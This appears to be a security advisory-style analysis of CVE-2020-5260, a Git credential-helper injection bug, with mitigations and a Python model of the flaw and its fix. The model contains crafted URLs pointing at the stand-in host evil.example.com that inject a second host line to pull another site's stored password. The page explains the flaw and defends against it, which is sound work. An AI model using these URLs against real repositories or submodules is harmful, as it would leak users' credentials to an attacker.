CVE-2020-5260
Git vulnerability analysis and mitigation

Overview

CVE-2020-5260 is a credential-injection vulnerability in Git's credential helper machinery, reported by Felix Wilhelm of Google Project Zero and disclosed on April 14, 2020. It affects Git releases up to and including 2.17.3, 2.18.2, 2.19.3, 2.20.2, 2.21.1, 2.22.2, 2.23.1, 2.24.1, 2.25.2, and 2.26.0. A URL containing a percent-encoded newline can trick Git into asking a credential helper for the password of one host and then sending it to a different, attacker-controlled host (GitHub Advisory).

Technical details

Git talks to credential helpers (the programs that store and retrieve passwords from operating-system secure storage) over a simple line-oriented protocol: it writes a request of key=value lines such as protocol=https, host=..., username=... to the helper's standard input, terminated by a blank line, and reads a reply in the same format. Before the fix, Git percent-decoded the components of a URL and copied the results into that request without checking them, so an encoded newline (%0a) inside the host or username component became a literal line break in the protocol stream. An attacker can use this to inject an extra line such as host=good.example.com after the real host line; because a helper takes the last value it sees for a key, it looks up and returns the stored credential for good.example.com, while the HTTP request itself still goes to evil.example.com. The credential for the former is therefore sent to the latter. The vulnerability has a CVSS 3.1 base score of 9.3 CRITICAL (NVD).

Impact

An attacker can craft a URL that causes Git to present the stored credentials for any host to a host of the attacker's choosing; there is no required relationship between the two hosts, which makes this a serious credential-exposure vulnerability. A URL of this kind looks suspicious when a user types it by hand, so the likelier vector is a system that clones URLs the user never sees, such as Git submodules or package managers built around Git (GitHub Advisory).

Mitigation and workarounds

The vulnerability was patched in Git 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, and 2.26.1, released on April 14, 2020. The fixed releases forbid a newline character in any value passed over the credential protocol: Git refuses to write such a value to a helper and rejects URLs whose decoded components contain one. Users who cannot upgrade immediately have two workarounds: disable credential helpers entirely (for example by unsetting credential.helper in every Git configuration level), or avoid feeding untrusted URLs to Git by checking the hostname and username parts of each URL, including those listed in .gitmodules, for encoded newlines (%0a, %0A) or other signs of credential-protocol injection before cloning (GitHub Advisory).
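The following Python program is an added example, not Git's code or anything from the advisory. It models the protocol exchange described under Technical details and the mitigations above: how a URL is split into the key=value request Git sends a helper, why a percent-encoded newline in the host or username component injects a second host= line, how a store-style helper then returns the wrong credential, and how a hardened parser (rejecting any decoded component that contains a line break, as the fixed releases do) and a .gitmodules scan (the workaround) stop it. The credential store, the hostnames good.example.com and evil.example.com, and the .gitmodules text are constructed for the illustration; the model keys credentials on protocol and host only and omits the path component, which Git sends only when credential.useHttpPath is set.

```python
"""Model of the CVE-2020-5260 credential-helper injection and its fixes.
Added example, not Git's own code; STORE and GITMODULES are constructed data."""
from urllib.parse import unquote  # percent-decoding, as Git's url_decode_mem does

# Constructed helper storage: a credential saved for good.example.com only.
STORE = {("https", "good.example.com"): ("alice", "s3cret")}

BENIGN = "https://good.example.com/repo.git"
# Encoded newline in the host part. curl treats everything after '?' as the
# query and connects to evil.example.com, but the pre-fix parser below (like
# Git's at the time) ends the host only at the first '/', so the whole
# '?%0ahost=good.example.com' is decoded as part of the host value.
MALICIOUS_HOST = "https://evil.example.com?%0ahost=good.example.com/"
# Same trick in the username; Git writes 'username=' after 'host='.
MALICIOUS_USER = "https://bob%0ahost=good.example.com@evil.example.com/"


def url_to_request(url, decode=unquote):
    """Split proto://[user[:password]@]host/... into the pairs Git sends a
    helper, in Git's write order. Components are cut up BEFORE decoding, so an
    encoded newline survives into the decoded value."""
    proto, sep, rest = url.partition("://")
    if not sep or not proto:
        raise ValueError(f"not a URL: {url!r}")
    authority = rest.partition("/")[0]        # host part ends at the first '/' only
    userinfo, at, host = authority.partition("@")
    if not at:
        userinfo, host = "", authority
    req = {"protocol": proto, "host": decode(host)}
    if at:
        user, colon, password = userinfo.partition(":")
        req["username"] = decode(user)
        if colon:
            req["password"] = decode(password)
    return req


def serialize(req):
    """The stream Git writes to the helper's stdin: key=value lines, then a
    blank line. Pre-fix Git did not check values for newlines."""
    return "".join(f"{key}={value}\n" for key, value in req.items()) + "\n"


def helper_parse(stream):
    """How a helper reads the stream: a key seen twice simply overwrites the
    earlier value, which is exactly what the injected 'host=' line relies on."""
    attrs = {}
    for line in stream.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        attrs[key] = value
    return attrs


def lookup(url, decode=unquote):
    """End to end: URL -> helper request -> credential a store-style helper
    returns from the toy STORE (None when nothing is stored for that host)."""
    attrs = helper_parse(serialize(url_to_request(url, decode)))
    return STORE.get((attrs.get("protocol"), attrs.get("host")))


def safe_decode(component):
    """Hardened decoding in the spirit of the fix: refuse a component whose
    decoded form contains a line break instead of passing it to a helper.
    A bare CR is rejected here too, which the 2020 fix itself did not do."""
    value = unquote(component)
    if "\n" in value or "\r" in value:
        raise ValueError(f"URL component {component!r} decodes to a newline")
    return value


def hardened_rejects(url):
    """True when the hardened parser refuses to build a request for the URL."""
    try:
        url_to_request(url, safe_decode)
    except ValueError:
        return True
    return False


# Constructed .gitmodules with one clean and one malicious submodule URL.
GITMODULES = """\
[submodule "lib"]
\tpath = lib
\turl = https://github.com/example/lib.git
[submodule "vendor"]
\tpath = vendor/vendor
\turl = https://evil.example.com?%0ahost=good.example.com/
"""


def suspicious_submodule_urls(gitmodules_text):
    """Workaround check for pipelines that cannot upgrade: flag submodule URLs
    whose decoded form contains a newline or CR before anything clones them."""
    hits = []
    for line in gitmodules_text.splitlines():
        key, _, value = line.strip().partition("=")
        if key.strip() == "url" and any(c in unquote(value.strip()) for c in "\r\n"):
            hits.append(value.strip())
    return hits


if __name__ == "__main__":
    for url in (BENIGN, MALICIOUS_HOST, MALICIOUS_USER):
        stream = serialize(url_to_request(url))
        print(f"{url}\n  helper stdin: {stream!r}\n  helper returns: {lookup(url)}"
              f"\n  hardened parser rejects: {hardened_rejects(url)}")
    print("suspicious submodule URLs:", suspicious_submodule_urls(GITMODULES))
```

Running it shows both malicious URLs producing a stream with two host= lines and the helper returning alice's credential for good.example.com, while the hardened parser rejects them and accepts the benign URL unchanged. The scanner is deliberately applied to the decoded form of the URL so that %0a, %0A, %0d and %0D are all caught; rejecting a bare carriage return goes beyond the 2020 fix, which checked for line feeds only, and corresponds to a later, separate Git fix (CVE-2024-52006).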

Community reactions

The vulnerability was treated as a critical security issue, with major Linux distributions like Debian, Ubuntu, and Fedora quickly releasing security updates. Software projects using Git, such as Sourcetree, also released advisories and patches for their users (Sourcetree Advisory).


Related Git vulnerabilities:

CVE ID           Severity  Score  Technologies  Component name              CISA KEV exploit  Has fix  Published date
CVE-2024-32465   HIGH      7.8    Git           cpe:2.3:a:git_project:git   No                Yes      May 14, 2024
CVE-2024-52005   HIGH      7.5    Git           git-email                   No                Yes      Jan 15, 2025
CVE-2024-52006   LOW       2.1    Git           emacs-git-el                No                Yes      Jan 14, 2025
CVE-2024-50349   LOW       2.1    Git           perl-Git-SVN                No                Yes      Jan 14, 2025
ELSA-2025-11534  HIGH      N/A    Git           git-credential-libsecret    No                Yes      Jul 22, 2025
